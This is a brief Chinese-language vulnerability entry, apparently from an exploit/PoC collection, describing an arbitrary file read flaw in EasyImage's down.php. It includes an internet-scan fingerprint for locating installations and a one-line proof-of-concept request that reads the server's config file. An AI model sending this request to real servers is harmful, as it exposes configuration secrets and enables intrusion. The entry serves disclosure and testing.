EasyImage down.php 任意文件读取漏洞

漏洞描述

EasyImage down.php 文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器任意文件

漏洞影响

EasyImage

网络测绘

app="EasyImage-简单图床"

漏洞复现

主页面

验证POC

/application/down.php?dw=./config/config.php